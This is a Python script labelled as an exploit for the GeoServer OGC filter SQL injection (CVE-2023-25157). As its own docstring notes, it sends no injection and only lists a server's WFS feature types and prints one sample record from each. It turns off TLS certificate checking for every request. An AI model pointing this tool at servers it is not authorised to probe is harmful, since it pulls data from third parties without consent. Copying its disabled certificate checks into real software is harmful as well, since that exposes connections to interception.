import argparse
import requests
import sys
import xml.etree.ElementTree as ET
import json
import urllib3
import colorama
from colorama import Fore, Style
# Initialise colorama so the Fore/Style colour codes used below render on
# consoles that need translation.
colorama.init()

# Every request in this script is sent with verify=False, so urllib3 would emit
# an InsecureRequestWarning for each one. This only silences the warning: the
# TLS peer is still not authenticated.
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
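class GeoServerSQLI():
    """Enumerate WFS feature types on a GeoServer host and print sample properties.

    The script is published as a checker for CVE-2023-25157 (GeoServer OGC
    filter SQL injection).  As written, this class only issues ordinary WFS
    ``GetCapabilities`` and ``GetFeature`` requests without credentials and
    sends no filter expression, so its output shows what the endpoint already
    serves to an anonymous client rather than demonstrating the injection.
    """

    # Seconds to wait for each HTTP request; without a timeout requests.get()
    # can block indefinitely on an unresponsive host.
    REQUEST_TIMEOUT = 15

    def __init__(self, url):
        """Store the base URL (scheme and host, without the ``/geoserver`` path)."""
        self.url = url

    def getFeatures(self):
        """Return the feature type names advertised by WFS GetCapabilities.

        Returns:
            A list of feature type names (possibly empty), or ``None`` when
            the response status is not 200 or the body is not well-formed XML.

        Exits the process with status 1 when the HTTP request itself fails.
        """
        try:
            # NOTE(security): verify=False disables TLS certificate validation,
            # so the server's identity is not checked.
            response = requests.get(
                self.url + "/geoserver/ows?service=WFS&version=1.0.0&request=GetCapabilities",
                verify=False,
                timeout=self.REQUEST_TIMEOUT,
            )
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            print(f"{Fore.RED}Failed to retrieve XML data: {e}{Style.RESET_ALL}")
            sys.exit(1)

        # raise_for_status() only rejects 4xx/5xx, so other non-200 codes land here.
        if response.status_code != 200:
            print(f"{Fore.RED}Failed to retrieve XML data{Style.RESET_ALL}")
            return None

        try:
            # Parse the raw bytes so the XML declaration decides the encoding
            # instead of the charset requests guessed for response.text.
            # NOTE(security): the body comes from the remote host and is
            # untrusted; the standard-library parser is not hardened against
            # entity-expansion documents (defusedxml is the usual hardened
            # replacement).
            root = ET.fromstring(response.content)
        except ET.ParseError as e:
            print(f"{Fore.RED}Failed to retrieve XML data: {e}{Style.RESET_ALL}")
            return None

        feature_types = root.findall('.//{http://www.opengis.net/wfs}FeatureType')
        names = (
            feature_type.findtext('{http://www.opengis.net/wfs}Name')
            for feature_type in feature_types
        )
        # findtext() yields None for a FeatureType without a Name child; drop
        # those instead of later requesting the literal type name "None".
        return [name for name in names if name]

    def getProperties(self, namesFeatures, ql_filters="strStartsWith"):
        """Print the properties of one sample feature for each feature type.

        Args:
            namesFeatures: Iterable of feature type names, as returned by
                ``getFeatures``.
            ql_filters: Unused by this implementation; kept so existing
                callers keep working.

        Exits the process with status 0 when interrupted with Ctrl-C.
        """
        try:
            for name in namesFeatures:
                self._printSampleProperties(name)
        except KeyboardInterrupt:
            print(f"\n{Fore.RED}Process Terminated by User{Style.RESET_ALL}")
            sys.exit(0)

    def _printSampleProperties(self, name):
        """Fetch at most one feature of type *name* and print its properties."""
        # Passing the query as params lets requests URL-encode the feature
        # name, which originates from the remote server's capabilities XML.
        query = {
            "service": "wfs",
            "version": "1.0.0",
            "request": "GetFeature",
            "typeName": name,
            "maxFeatures": 1,
            "outputFormat": "json",
        }
        try:
            response = requests.get(
                self.url + "/geoserver/ows",
                params=query,
                verify=False,  # NOTE(security): TLS certificate is not validated
                timeout=self.REQUEST_TIMEOUT,
            )
            response.raise_for_status()
        except requests.exceptions.RequestException as e:
            # Report the failure instead of silently skipping the type.
            print(f"{Fore.RED}Request for {name} failed: {e}{Style.RESET_ALL}")
            return

        try:
            # Invalid JSON surfaces as a ValueError subclass; a body that is
            # valid JSON but not the expected object gives KeyError/TypeError.
            features_list = response.json()['features']
        except (ValueError, KeyError, TypeError):
            print(f"{Fore.RED}Failed to parse JSON response for {name}{Style.RESET_ALL}")
            return

        print(f"\n{Fore.BLUE} Properties for {name}:{Style.RESET_ALL}")
        for feature in features_list:
            # GeoJSON permits "properties": null; treat that as no properties.
            properties_list = feature.get('properties') or {}
            # NOTE(security): keys and values are server-controlled and are
            # written to the terminal verbatim.
            for key, value in properties_list.items():
                print(f"{Fore.GREEN}{key}:{Fore.YELLOW} {value}{Style.RESET_ALL}")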
def arguments():
    """Parse the command line and return the namespace holding ``url``.

    The single positional argument ``url`` is the base URL of the GeoServer
    host; argparse exits with a usage message when it is missing.
    """
    cli = argparse.ArgumentParser(
        description="GeoServer OGC Filter SQL Injection Vulnerabilities Exploit",
    )
    cli.add_argument("url", type=str, help="URL of the target GeoServer")
    parsed = cli.parse_args()
    return parsed
def main():
    """Read the base URL from the command line, list feature types, print samples.

    Nothing further is printed when getFeatures() returns None or an empty
    list.
    """
    cli_args = arguments()
    scanner = GeoServerSQLI(cli_args.url)
    feature_names = scanner.getFeatures()
    # Guard clause: no feature types means there is nothing to query.
    if not feature_names:
        return
    scanner.getProperties(feature_names)


if __name__ == "__main__":
    main()